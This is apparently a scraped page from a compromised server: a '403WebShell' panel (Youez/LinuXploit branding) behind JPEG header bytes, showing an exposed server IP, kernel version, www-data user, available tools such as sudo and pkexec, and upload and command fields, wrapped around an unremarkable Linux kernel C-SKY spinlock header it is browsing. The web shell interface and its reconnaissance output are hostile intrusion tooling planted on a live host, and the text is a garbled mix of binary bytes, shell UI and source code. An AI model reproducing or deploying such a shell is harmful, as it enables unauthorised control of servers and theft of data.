����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 216.73.216.26
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/lib/modules/5.4.0-163-generic/build/arch/csky/include/asm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/lib/modules/5.4.0-163-generic/build/arch/csky/include/asm/spinlock.h
/* SPDX-License-Identifier: GPL-2.0 */

#ifndef __ASM_CSKY_SPINLOCK_H
#define __ASM_CSKY_SPINLOCK_H

#include <linux/spinlock_types.h>
#include <asm/barrier.h>

#ifdef CONFIG_QUEUED_RWLOCKS

/*
 * Ticket-based spin-locking.
 */
static inline void arch_spin_lock(arch_spinlock_t *lock)
{
	arch_spinlock_t lockval;
	u32 ticket_next = 1 << TICKET_NEXT;
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%2) \n"
		"	mov		%1, %0	 \n"
		"	add		%0, %3	 \n"
		"	stex.w		%0, (%2) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp), "=&r" (lockval)
		: "r"(p), "r"(ticket_next)
		: "cc");

	while (lockval.tickets.next != lockval.tickets.owner)
		lockval.tickets.owner = READ_ONCE(lock->tickets.owner);

	smp_mb();
}

static inline int arch_spin_trylock(arch_spinlock_t *lock)
{
	u32 tmp, contended, res;
	u32 ticket_next = 1 << TICKET_NEXT;
	u32 *p = &lock->lock;

	do {
		asm volatile (
		"	ldex.w		%0, (%3)   \n"
		"	movi		%2, 1	   \n"
		"	rotli		%1, %0, 16 \n"
		"	cmpne		%1, %0     \n"
		"	bt		1f         \n"
		"	movi		%2, 0	   \n"
		"	add		%0, %0, %4 \n"
		"	stex.w		%0, (%3)   \n"
		"1:				   \n"
		: "=&r" (res), "=&r" (tmp), "=&r" (contended)
		: "r"(p), "r"(ticket_next)
		: "cc");
	} while (!res);

	if (!contended)
		smp_mb();

	return !contended;
}

static inline void arch_spin_unlock(arch_spinlock_t *lock)
{
	smp_mb();
	WRITE_ONCE(lock->tickets.owner, lock->tickets.owner + 1);
}

static inline int arch_spin_value_unlocked(arch_spinlock_t lock)
{
	return lock.tickets.owner == lock.tickets.next;
}

static inline int arch_spin_is_locked(arch_spinlock_t *lock)
{
	return !arch_spin_value_unlocked(READ_ONCE(*lock));
}

static inline int arch_spin_is_contended(arch_spinlock_t *lock)
{
	struct __raw_tickets tickets = READ_ONCE(lock->tickets);

	return (tickets.next - tickets.owner) > 1;
}
#define arch_spin_is_contended	arch_spin_is_contended

#include <asm/qrwlock.h>

/* See include/linux/spinlock.h */
#define smp_mb__after_spinlock()	smp_mb()

#else /* CONFIG_QUEUED_RWLOCKS */

/*
 * Test-and-set spin-locking.
 */
static inline void arch_spin_lock(arch_spinlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 1b   \n"
		"	movi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
	smp_mb();
}

static inline void arch_spin_unlock(arch_spinlock_t *lock)
{
	smp_mb();
	WRITE_ONCE(lock->lock, 0);
}

static inline int arch_spin_trylock(arch_spinlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 2f   \n"
		"	movi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		"	movi		%0, 0    \n"
		"2:				 \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");

	if (!tmp)
		smp_mb();

	return !tmp;
}

#define arch_spin_is_locked(x)	(READ_ONCE((x)->lock) != 0)

/*
 * read lock/unlock/trylock
 */
static inline void arch_read_lock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	blz		%0, 1b   \n"
		"	addi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
	smp_mb();
}

static inline void arch_read_unlock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	smp_mb();
	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	subi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
}

static inline int arch_read_trylock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	blz		%0, 2f   \n"
		"	addi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		"	movi		%0, 0    \n"
		"2:				 \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");

	if (!tmp)
		smp_mb();

	return !tmp;
}

/*
 * write lock/unlock/trylock
 */
static inline void arch_write_lock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 1b   \n"
		"	subi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");
	smp_mb();
}

static inline void arch_write_unlock(arch_rwlock_t *lock)
{
	smp_mb();
	WRITE_ONCE(lock->lock, 0);
}

static inline int arch_write_trylock(arch_rwlock_t *lock)
{
	u32 *p = &lock->lock;
	u32 tmp;

	asm volatile (
		"1:	ldex.w		%0, (%1) \n"
		"	bnez		%0, 2f   \n"
		"	subi		%0, 1    \n"
		"	stex.w		%0, (%1) \n"
		"	bez		%0, 1b   \n"
		"	movi		%0, 0    \n"
		"2:				 \n"
		: "=&r" (tmp)
		: "r"(p)
		: "cc");

	if (!tmp)
		smp_mb();

	return !tmp;
}

#endif /* CONFIG_QUEUED_RWLOCKS */
#endif /* __ASM_CSKY_SPINLOCK_H */

Youez - 2016 - github.com/yon3zu
LinuXploit